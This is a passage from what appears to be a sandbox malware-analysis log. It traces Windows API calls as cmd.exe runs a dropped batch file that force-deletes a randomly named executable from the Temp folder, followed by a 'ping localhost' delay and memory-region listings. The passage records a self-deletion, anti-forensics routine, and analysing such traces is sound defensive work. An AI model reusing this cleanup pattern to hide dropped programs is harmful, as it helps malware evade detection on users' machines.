lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", lpFilePart=0x22e370*="yAQb5Zg8.exe") returned 0x30 [0104.289] SetErrorMode (uMode=0x0) returned 0x1 [0104.289] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0104.289] _wcsicmp (_String1="yAQb5Zg8.exe", _String2=".") returned 75 [0104.289] _wcsicmp (_String1="yAQb5Zg8.exe", _String2="..") returned 75 [0104.289] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x2020 [0104.289] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", fInfoLevelId=0x0, lpFindFileData=0x330554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x330554) returned 0x310aa8 [0104.289] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 1 [0104.290] FindNextFileW (in: hFindFile=0x310aa8, lpFindFileData=0x330554 | out: lpFindFileData=0x330554) returned 0 
[0104.290] GetLastError () returned 0x12 [0104.290] FindClose (in: hFindFile=0x310aa8 | out: hFindFile=0x310aa8) returned 1 [0104.291] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.291] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0104.291] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.291] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0104.291] _get_osfhandle (_FileHandle=0) returned 0x3 [0104.291] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0104.291] SetConsoleInputExeNameW () returned 0x1 [0104.291] GetConsoleOutputCP () returned 0x1b5 [0104.291] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0104.291] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.291] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\qqzakklz.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f324, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0104.292] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0104.292] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.292] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0104.292] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.292] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0104.292] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f308, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f308*=0x3e, lpOverlapped=0x0) returned 1 [0104.292] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=62, 
lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\n") returned 62 [0104.292] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.292] GetFileType (hFile=0x54) returned 0x1 [0104.292] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.292] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0104.293] _tell (_FileHandle=3) returned 145 [0104.293] _close (_FileHandle=3) returned 0 [0104.293] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f0dc | out: _Buffer="\r\n") returned 2 [0104.293] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.293] GetFileType (hFile=0x7) returned 0x2 [0104.293] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.293] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f09c | out: lpMode=0x22f09c) returned 1 [0104.293] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.293] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f0c8, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f0c8*=0x2) returned 1 [0104.294] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0104.294] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f0d8 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0104.294] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f0d8 | out: _Buffer=">") returned 1 [0104.294] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.294] GetFileType (hFile=0x7) returned 0x2 [0104.294] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.294] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f0a0 | out: lpMode=0x22f0a0) returned 1 [0104.294] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.294] 
WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f0cc, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x22f0cc*=0x19) returned 1 [0104.294] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.294] GetFileType (hFile=0x7) returned 0x2 [0104.294] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.294] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f324 | out: lpMode=0x22f324) returned 1 [0104.294] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.294] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x32f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x22f350, lpReserved=0x0 | out: lpBuffer=0x32f008*, lpNumberOfCharsWritten=0x22f350*=0x3) returned 1 [0104.295] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f35c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" ") returned 58 [0104.295] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.295] GetFileType (hFile=0x7) returned 0x2 [0104.295] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.295] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f31c | out: lpMode=0x22f31c) returned 1 [0104.295] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.295] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x22f348, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f348*=0x3a) returned 1 [0104.295] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f37c | out: _Buffer="\r\n") returned 2 [0104.295] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.295] GetFileType (hFile=0x7) returned 0x2 [0104.295] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.295] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f33c | out: lpMode=0x22f33c) returned 1 [0104.295] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.295] WriteConsoleW (in: 
hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f368, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f368*=0x2) returned 1 [0104.296] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0104.296] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0104.296] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0104.296] GetConsoleTitleW (in: lpConsoleTitle=0x22eeec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0104.296] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22eca4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0104.296] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22dd34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0104.296] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22df64, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x22df68, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22df64*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0104.296] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0104.296] _wcsicmp (_String1="yAQb5Zg8.exe", _String2=".") returned 75 [0104.296] _wcsicmp (_String1="yAQb5Zg8.exe", _String2="..") returned 75 [0104.296] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0xffffffff [0104.296] GetLastError () returned 0x2 [0104.296] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x322148 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0104.296] SetErrorMode (uMode=0x0) returned 0x0 [0104.296] SetErrorMode (uMode=0x1) returned 0x0 [0104.296] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", 
nBufferLength=0x104, lpBuffer=0x22e388, lpFilePart=0x22e370 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", lpFilePart=0x22e370*="yAQb5Zg8.exe") returned 0x30 [0104.296] SetErrorMode (uMode=0x0) returned 0x1 [0104.297] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0104.297] _wcsicmp (_String1="yAQb5Zg8.exe", _String2=".") returned 75 [0104.297] _wcsicmp (_String1="yAQb5Zg8.exe", _String2="..") returned 75 [0104.297] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0xffffffff [0104.297] GetLastError () returned 0x2 [0104.297] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", fInfoLevelId=0x0, lpFindFileData=0x330554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x330554) returned 0xffffffff [0104.297] GetLastError () returned 0x2 [0104.297] _get_osfhandle (_FileHandle=2) returned 0xb [0104.297] GetFileType (hFile=0xb) returned 0x2 [0104.297] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0104.297] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22e964 | out: lpMode=0x22e964) returned 1 [0104.297] _get_osfhandle (_FileHandle=2) returned 0xb [0104.297] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x22e998 | out: lpConsoleScreenBufferInfo=0x22e998) returned 1 [0104.297] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a124640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0104.298] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a124640, nSize=0x2000, Arguments=0x22e9d8 | out: lpBuffer="Could Not Find C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\r\n") 
returned 0x41 [0104.298] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x22e9bc, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22e9bc*=0x41) returned 1 [0104.298] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.298] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0104.298] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.298] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0104.299] _get_osfhandle (_FileHandle=0) returned 0x3 [0104.299] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0104.299] SetConsoleInputExeNameW () returned 0x1 [0104.299] GetConsoleOutputCP () returned 0x1b5 [0104.299] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0104.299] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.299] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\qqzakklz.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f324, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0104.299] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0104.299] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.299] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0104.299] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.299] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0104.299] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f308, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f308*=0x0, lpOverlapped=0x0) 
returned 1 [0104.299] GetLastError () returned 0x0 [0104.299] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.299] GetFileType (hFile=0x54) returned 0x1 [0104.300] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.300] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0104.300] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.300] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0104.300] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f2ec, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f2ec*=0x0, lpOverlapped=0x0) returned 1 [0104.300] GetLastError () returned 0x0 [0104.300] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.300] GetFileType (hFile=0x54) returned 0x1 [0104.300] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.300] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0104.300] longjmp () [0104.300] _tell (_FileHandle=3) returned 145 [0104.300] _close (_FileHandle=3) returned 0 [0104.300] CmdBatNotification () returned 0x0 [0104.300] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.300] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0104.300] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.300] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0104.301] _get_osfhandle (_FileHandle=0) returned 0x3 [0104.301] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0104.301] SetConsoleInputExeNameW () returned 0x1 [0104.301] GetConsoleOutputCP () returned 0x1b5 [0104.301] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0104.301] SetThreadUILanguage 
(LangId=0x0) returned 0x409 [0104.301] exit (_Code=0) Process: id = "23" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16660" os_pid = "0xbfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0xb88" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1476 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1477 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1478 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1479 start_va = 0x1c0000 end_va = 0x1c7fff entry_point = 0x1c0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 1480 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1481 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1482 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = 
"\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1483 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1484 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1485 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1490 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1491 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1492 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1493 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 1494 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1495 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1496 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1497 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1498 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1499 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1500 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1501 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1502 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1503 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1504 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1505 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1506 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = 
mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1507 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1508 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1509 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1510 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1511 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1512 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1513 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1514 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1515 start_va = 0x1b0000 end_va = 0x1b2fff entry_point = 0x1b0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 1516 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = 
"private_0x00000000001d0000" filename = "" Region: id = 1517 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1518 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 1519 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1520 start_va = 0x1150000 end_va = 0x141efff entry_point = 0x1150000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1521 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1522 start_va = 0x1420000 end_va = 0x150ffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 1523 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1524 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1525 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1526 start_va = 0x1510000 end_va = 0x167ffff entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 1587 
start_va = 0x1570000 end_va = 0x15affff entry_point = 0x0 region_type = private name = "private_0x0000000001570000" filename = "" Region: id = 1588 start_va = 0x1640000 end_va = 0x167ffff entry_point = 0x0 region_type = private name = "private_0x0000000001640000" filename = "" Region: id = 1589 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1590 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1591 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1592 start_va = 0x1680000 end_va = 0x180ffff entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 1633 start_va = 0x1420000 end_va = 0x145ffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 1634 start_va = 0x14d0000 end_va = 0x150ffff entry_point = 0x0 region_type = private name = "private_0x00000000014d0000" filename = "" Region: id = 1635 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1660 start_va = 0x1600000 end_va = 0x163ffff entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 1661 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 32 